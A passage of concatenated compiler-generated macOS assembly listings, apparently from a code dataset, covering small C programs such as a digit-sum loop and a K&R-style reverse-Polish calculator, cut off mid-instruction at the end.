.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -36(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_6 Depth 2 ## Child Loop BB0_8 Depth 3 leaq -19(%rbp), %rdi xorl %esi, %esi movl $11, %edx callq _memset leaq -30(%rbp), %rdi xorl %esi, %esi movl $11, %edx callq _memset leaq -19(%rbp), %rdi movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdx movl $11, %esi callq _fgets leaq -19(%rbp), %rdi leaq L_.str(%rip), %rsi callq _strcspn movb $0, -19(%rbp,%rax) movsbl -19(%rbp), %eax subl $48, %eax cmpl $0, %eax jne LBB0_3 ## %bb.2: jmp LBB0_14 LBB0_3: ## in Loop: Header=BB0_1 Depth=1 leaq -19(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -40(%rbp) cmpl $1, -40(%rbp) jne LBB0_5 ## %bb.4: ## in Loop: Header=BB0_1 Depth=1 movsbl -19(%rbp), %esi subl $48, %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf jmp LBB0_1 LBB0_5: ## in Loop: Header=BB0_1 Depth=1 leaq -30(%rbp), %rdi leaq -19(%rbp), %rsi movl $11, %edx callq ___strcpy_chk LBB0_6: ## Parent Loop BB0_1 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB0_8 Depth 3 cmpl $1, -40(%rbp) jle LBB0_12 ## %bb.7: ## in Loop: Header=BB0_6 Depth=2 movl $0, -44(%rbp) movl $0, -48(%rbp) LBB0_8: ## Parent Loop BB0_1 Depth=1 ## Parent Loop BB0_6 Depth=2 ## => This Inner Loop Header: Depth=3 movl -48(%rbp), %eax cmpl -40(%rbp), %eax jge LBB0_11 ## %bb.9: ## in Loop: Header=BB0_8 Depth=3 movl -44(%rbp), %eax movslq -48(%rbp), %rcx movsbl -30(%rbp,%rcx), %ecx subl $48, %ecx addl %ecx, %eax movl %eax, -44(%rbp) ## %bb.10: ## in Loop: Header=BB0_8 Depth=3 movl -48(%rbp), %eax addl $1, %eax movl %eax, -48(%rbp) jmp LBB0_8 LBB0_11: ## in Loop: Header=BB0_6 Depth=2 leaq -30(%rbp), %rdi xorl %esi, %esi movl $11, %edx callq _memset leaq -30(%rbp), %rdi movl -44(%rbp), %r8d xorl %esi, %esi movl $11, %edx leaq L_.str.2(%rip), %rcx movb $0, %al callq ___sprintf_chk leaq -30(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -40(%rbp) jmp LBB0_6 LBB0_12: ## in Loop: Header=BB0_1 Depth=1 movl -44(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.13: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_14: movl -36(%rbp), %eax movl %eax, -52(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_16 ## %bb.15: movl -52(%rbp), %eax ## 4-byte Reload addq $64, %rsp popq %rbp retq LBB0_16: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\n" L_.str.1: ## @.str.1 .asciz "%d\n" L_.str.2: ## @.str.2 .asciz "%d" .subsections_via_symbols
the_stack_data/462817.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _rs_write ; -- Begin function rs_write .p2align 2 _rs_write: ; @rs_write .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _rs_write ## -- Begin function rs_write .p2align 4, 0x90 _rs_write: ## @rs_write .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/96848.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: mov w0, #0 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/99562.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #192 .cfi_def_cfa_offset 192 stp x29, x30, [sp, #176] ; 16-byte Folded Spill add x29, sp, #176 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #64] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 add x0, sp, #68 bl _getop str w0, [sp, #60] adds w8, w0, #1 cset w8, eq tbnz w8, #0, LBB0_24 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #60] subs w8, w8, #10 ; kill: def $x8 killed $w8 str x8, [sp, #32] ; 8-byte Folded Spill subs x8, x8, #116 cset w8, hi tbnz w8, #0, LBB0_22 ; %bb.3: ; in Loop: Header=BB0_1 Depth=1 ldr x11, [sp, #32] ; 8-byte Folded Reload adrp x10, lJTI0_0@PAGE add x10, x10, lJTI0_0@PAGEOFF Ltmp0: adr x8, Ltmp0 ldrsw x9, [x10, x11, lsl #2] add x8, x8, x9 br x8 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 add x0, sp, #68 bl _atof bl _push b LBB0_23 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 add x0, sp, #68 bl _func b LBB0_23 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 bl _pop str d0, [sp, #24] ; 8-byte Folded Spill bl _pop fmov d1, d0 ldr d0, [sp, #24] ; 8-byte Folded Reload fadd d0, d0, d1 bl _push b LBB0_23 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 bl _pop str d0, [sp, #16] ; 8-byte Folded Spill bl _pop fmov d1, d0 ldr d0, [sp, #16] ; 8-byte Folded Reload fmul d0, d0, d1 bl _push b LBB0_23 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 bl _pop str d0, [sp, #40] bl _pop ldr d1, [sp, #40] fsub d0, d0, d1 bl _push b LBB0_23 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 bl _pop str d0, [sp, #40] ldr d0, [sp, #40] fcmp d0, #0.0 cset w8, eq tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 bl _pop ldr d1, [sp, #40] fdiv d0, d0, d1 bl _push b LBB0_12 LBB0_11: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_12 LBB0_12: ; in Loop: Header=BB0_1 Depth=1 b LBB0_23 LBB0_13: ; in Loop: Header=BB0_1 Depth=1 bl _pop str d0, [sp, #40] ldr d0, [sp, #40] fcmp d0, #0.0 cset w8, eq tbnz w8, #0, LBB0_15 b LBB0_14 LBB0_14: ; in Loop: Header=BB0_1 Depth=1 bl _pop fcvtzs w8, d0 ldr d0, [sp, #40] fcvtzs w10, d0 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 scvtf d0, w8 bl _push b LBB0_16 LBB0_15: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_16 LBB0_16: ; in Loop: Header=BB0_1 Depth=1 b LBB0_23 LBB0_17: ; in Loop: Header=BB0_1 Depth=1 bl _top mov x8, sp str d0, [x8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_23 LBB0_18: ; in Loop: Header=BB0_1 Depth=1 bl _pop str d0, [sp, #40] ldr d0, [sp, #40] bl _push ldr d0, [sp, #40] bl _push b LBB0_23 LBB0_19: ; in Loop: Header=BB0_1 Depth=1 bl _pop str d0, [sp, #48] bl _pop str d0, [sp, #40] ldr d0, [sp, #48] bl _push ldr d0, [sp, #40] bl _push b LBB0_23 LBB0_20: ; in Loop: Header=BB0_1 Depth=1 bl _clear b LBB0_23 LBB0_21: ; in Loop: Header=BB0_1 Depth=1 bl _pop mov x8, sp str d0, [x8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_23 LBB0_22: ; in Loop: Header=BB0_1 Depth=1 mov x9, sp add x8, sp, #68 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_23 LBB0_23: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_24: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_26 b LBB0_25 LBB0_25: bl ___stack_chk_fail LBB0_26: mov w0, #0 ldp x29, x30, [sp, #176] ; 16-byte Folded Reload add sp, sp, #192 ret .cfi_endproc .p2align 2 lJTI0_0: .long LBB0_21-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_20-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_18-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_13-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_7-Ltmp0 .long LBB0_6-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_8-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_9-Ltmp0 .long LBB0_4-Ltmp0 .long LBB0_5-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_17-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_22-Ltmp0 .long LBB0_19-Ltmp0 ; -- End function .globl _getop ; -- Begin function getop .p2align 2 _getop: ; @getop .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 bl _getch str w0, [sp, #8] ldr x8, [sp, #16] strb w0, [x8] sxtb w8, w0 subs w8, w8, #32 cset w8, eq mov w9, #1 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] subs w8, w8, #9 cset w8, eq str w8, [sp, #4] ; 4-byte Folded Spill b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #4] ; 4-byte Folded Reload tbz w8, #0, LBB1_5 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 b LBB1_1 LBB1_5: ldr x8, [sp, #16] strb wzr, [x8, #1] str wzr, [sp, #12] ldr w0, [sp, #8] bl _islower subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_12 b LBB1_6 LBB1_6: b LBB1_7 LBB1_7: ; =>This Inner Loop Header: Depth=1 bl _getch str w0, [sp, #8] ldr x8, [sp, #16] ldr w9, [sp, #12] add w9, w9, #1 str w9, [sp, #12] strb w0, [x8, w9, sxtw] sxtb w0, w0 bl _islower subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_9 b LBB1_8 LBB1_8: ; in Loop: Header=BB1_7 Depth=1 b LBB1_7 LBB1_9: ldr x8, [sp, #16] ldrsw x9, [sp, #12] add x8, x8, x9 strb wzr, [x8] ldr w8, [sp, #8] adds w8, w8, #1 cset w8, eq tbnz w8, #0, LBB1_11 b LBB1_10 LBB1_10: ldr w0, [sp, #8] bl _ungetch b LBB1_11 LBB1_11: mov w8, #49 stur w8, [x29, #-4] b LBB1_33 LBB1_12: ldr w0, [sp, #8] bl _isdigit subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_16 b LBB1_13 LBB1_13: ldr w8, [sp, #8] subs w8, w8, #46 cset w8, eq tbnz w8, #0, LBB1_16 b LBB1_14 LBB1_14: ldr w8, [sp, #8] subs w8, w8, #45 cset w8, eq tbnz w8, #0, LBB1_16 b LBB1_15 LBB1_15: ldr w8, [sp, #8] stur w8, [x29, #-4] b LBB1_33 LBB1_16: ldr w8, [sp, #8] subs w8, w8, #45 cset w8, ne tbnz w8, #0, LBB1_20 b LBB1_17 LBB1_17: bl _getch str w0, [sp, #8] ldr x8, [sp, #16] ldr w9, [sp, #12] add w9, w9, #1 str w9, [sp, #12] strb w0, [x8, w9, sxtw] sxtb w0, w0 bl _isdigit subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_19 b LBB1_18 LBB1_18: ldr w0, [sp, #8] bl _ungetch mov w8, #45 stur w8, [x29, #-4] b LBB1_33 LBB1_19: b LBB1_20 LBB1_20: ldr w0, [sp, #8] bl _isdigit subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_25 b LBB1_21 LBB1_21: b LBB1_22 LBB1_22: ; =>This Inner Loop Header: Depth=1 bl _getch str w0, [sp, #8] ldr x8, [sp, #16] ldr w9, [sp, #12] add w9, w9, #1 str w9, [sp, #12] strb w0, [x8, w9, sxtw] sxtb w0, w0 bl _isdigit subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_24 b LBB1_23 LBB1_23: ; in Loop: Header=BB1_22 Depth=1 b LBB1_22 LBB1_24: b LBB1_25 LBB1_25: ldr w8, [sp, #8] subs w8, w8, #46 cset w8, ne tbnz w8, #0, LBB1_30 b LBB1_26 LBB1_26: b LBB1_27 LBB1_27: ; =>This Inner Loop Header: Depth=1 bl _getch str w0, [sp, #8] ldr x8, [sp, #16] ldr w9, [sp, #12] add w9, w9, #1 str w9, [sp, #12] strb w0, [x8, w9, sxtw] sxtb w0, w0 bl _isdigit subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_29 b LBB1_28 LBB1_28: ; in Loop: Header=BB1_27 Depth=1 b LBB1_27 LBB1_29: b LBB1_30 LBB1_30: ldr x8, [sp, #16] ldrsw x9, [sp, #12] add x8, x8, x9 strb wzr, [x8] ldr w8, [sp, #8] adds w8, w8, #1 cset w8, eq tbnz w8, #0, LBB1_32 b LBB1_31 LBB1_31: ldr w0, [sp, #8] bl _ungetch b LBB1_32 LBB1_32: mov w8, #48 stur w8, [x29, #-4] b LBB1_33 LBB1_33: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _push ; -- Begin function push .p2align 2 _push: ; @push .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str d0, [sp, #8] adrp x8, _sp@PAGE ldr w8, [x8, _sp@PAGEOFF] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: ldr d0, [sp, #8] adrp x10, _sp@PAGE ldrsw x9, [x10, _sp@PAGEOFF] mov x8, x9 add w8, w8, #1 str w8, [x10, _sp@PAGEOFF] adrp x8, _val@GOTPAGE ldr x8, [x8, _val@GOTPAGEOFF] str d0, [x8, x9, lsl #3] b LBB2_3 LBB2_2: ldr d0, [sp, #8] mov x8, sp str d0, [x8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB2_3 LBB2_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _func ; -- Begin function func .p2align 2 _func: ; @func .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x0, [x29, #-8] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_2 b LBB3_1 LBB3_1: bl _pop bl _sin bl _push b LBB3_9 LBB3_2: ldur x0, [x29, #-8] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_4 b LBB3_3 LBB3_3: bl _pop bl _exp bl _push b LBB3_8 LBB3_4: ldur x0, [x29, #-8] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_6 b LBB3_5 LBB3_5: bl _pop str d0, [sp, #16] bl _pop ldr d1, [sp, #16] bl _pow bl _push b LBB3_7 LBB3_6: ldur x8, [x29, #-8] mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB3_7 LBB3_7: b LBB3_8 LBB3_8: b LBB3_9 LBB3_9: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _pop ; -- Begin function pop .p2align 2 _pop: ; @pop .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _sp@PAGE ldr w8, [x8, _sp@PAGEOFF] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: adrp x8, _sp@PAGE ldr w9, [x8, _sp@PAGEOFF] subs w9, w9, #1 str w9, [x8, _sp@PAGEOFF] adrp x8, _val@GOTPAGE ldr x8, [x8, _val@GOTPAGEOFF] ldr d0, [x8, w9, sxtw #3] str d0, [sp, #8] b LBB4_3 LBB4_2: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf movi d0, #0000000000000000 str d0, [sp, #8] b LBB4_3 LBB4_3: ldr d0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _top ; -- Begin function top .p2align 2 _top: ; @top .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _sp@PAGE ldr w8, [x8, _sp@PAGEOFF] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: adrp x8, _sp@PAGE ldr w8, [x8, _sp@PAGEOFF] subs w9, w8, #1 adrp x8, _val@GOTPAGE ldr x8, [x8, _val@GOTPAGEOFF] ldr d0, [x8, w9, sxtw #3] str d0, [sp, #8] b LBB5_3 LBB5_2: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf movi d0, #0000000000000000 str d0, [sp, #8] b LBB5_3 LBB5_3: ldr d0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _clear ; -- Begin function clear .p2align 2 _clear: ; @clear .cfi_startproc ; %bb.0: adrp x8, _sp@PAGE str wzr, [x8, _sp@PAGEOFF] ret .cfi_endproc ; -- End function .globl _getch ; -- Begin function getch .p2align 2 _getch: ; @getch .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _bufp@PAGE ldr w8, [x8, _bufp@PAGEOFF] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB7_2 b LBB7_1 LBB7_1: adrp x8, _bufp@PAGE ldr w9, [x8, _bufp@PAGEOFF] subs w9, w9, #1 str w9, [x8, _bufp@PAGEOFF] adrp x8, _buf@GOTPAGE ldr x8, [x8, _buf@GOTPAGEOFF] ldrsb w0, [x8, w9, sxtw] stur w0, [x29, #-4] ; 4-byte Folded Spill b LBB7_3 LBB7_2: bl _getchar stur w0, [x29, #-4] ; 4-byte Folded Spill b LBB7_3 LBB7_3: ldur w0, [x29, #-4] ; 4-byte Folded Reload ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _ungetch ; -- Begin function ungetch .p2align 2 _ungetch: ; @ungetch .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] adrp x8, _bufp@PAGE ldr w8, [x8, _bufp@PAGEOFF] subs w8, w8, #100 cset w8, lt tbnz w8, #0, LBB8_2 b LBB8_1 LBB8_1: adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf b LBB8_3 LBB8_2: ldur w8, [x29, #-4] adrp x11, _bufp@PAGE ldrsw x10, [x11, _bufp@PAGEOFF] mov x9, x10 add w9, w9, #1 str w9, [x11, _bufp@PAGEOFF] adrp x9, _buf@GOTPAGE ldr x9, [x9, _buf@GOTPAGEOFF] strb w8, [x9, x10] b LBB8_3 LBB8_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "error: zero divisor\n" l_.str.1: ; @.str.1 .asciz "\t%.8g\n" l_.str.2: ; @.str.2 .asciz "error: unknown command %s\n" .globl _sp ; @sp .zerofill __DATA,__common,_sp,4,2 .comm _val,800,3 ; @val l_.str.3: ; @.str.3 .asciz "error: stack full, can't push %g\n" l_.str.4: ; @.str.4 .asciz "error: stack empty\n" l_.str.5: ; @.str.5 .asciz "sin" l_.str.6: ; @.str.6 .asciz "exp" l_.str.7: ; @.str.7 .asciz "pow" .globl _bufp ; @bufp .zerofill __DATA,__common,_bufp,4,2 .comm _buf,100,0 ; @buf l_.str.8: ; @.str.8 .asciz "ungetch: too many characters\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $160, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -116(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 leaq -112(%rbp), %rdi callq _getop movl %eax, -120(%rbp) cmpl $-1, %eax je LBB0_23 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -120(%rbp), %eax addl $-10, %eax movl %eax, %ecx movq %rcx, -144(%rbp) ## 8-byte Spill subl $116, %eax ja LBB0_21 ## %bb.26: ## in Loop: Header=BB0_1 Depth=1 movq -144(%rbp), %rax ## 8-byte Reload leaq LJTI0_0(%rip), %rcx movslq (%rcx,%rax,4), %rax addq %rcx, %rax jmpq *%rax LBB0_3: ## in Loop: Header=BB0_1 Depth=1 leaq -112(%rbp), %rdi callq _atof callq _push jmp LBB0_22 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 leaq -112(%rbp), %rdi callq _func jmp LBB0_22 LBB0_5: ## in Loop: Header=BB0_1 Depth=1 callq _pop movsd %xmm0, -152(%rbp) ## 8-byte Spill callq _pop movaps %xmm0, %xmm1 movsd -152(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero addsd %xmm1, %xmm0 callq _push jmp LBB0_22 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 callq _pop movsd %xmm0, -160(%rbp) ## 8-byte Spill callq _pop movaps %xmm0, %xmm1 movsd -160(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 callq _push jmp LBB0_22 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 callq _pop movsd %xmm0, -136(%rbp) callq _pop subsd -136(%rbp), %xmm0 callq _push jmp LBB0_22 LBB0_8: ## in Loop: Header=BB0_1 Depth=1 callq _pop movsd %xmm0, -136(%rbp) movsd -136(%rbp), %xmm0 ## xmm0 = mem[0],zero xorps %xmm1, %xmm1 ucomisd %xmm1, %xmm0 jne LBB0_9 jp LBB0_9 jmp LBB0_10 LBB0_9: ## in Loop: Header=BB0_1 Depth=1 callq _pop divsd -136(%rbp), %xmm0 callq _push jmp LBB0_11 LBB0_10: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str(%rip), %rdi movb $0, %al callq _printf LBB0_11: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_22 LBB0_12: ## in Loop: Header=BB0_1 Depth=1 callq _pop movsd %xmm0, -136(%rbp) movsd -136(%rbp), %xmm0 ## xmm0 = mem[0],zero xorps %xmm1, %xmm1 ucomisd %xmm1, %xmm0 jne LBB0_13 jp LBB0_13 jmp LBB0_14 LBB0_13: ## in Loop: Header=BB0_1 Depth=1 callq _pop cvttsd2si %xmm0, %eax cvttsd2si -136(%rbp), %ecx cltd idivl %ecx cvtsi2sd %edx, %xmm0 callq 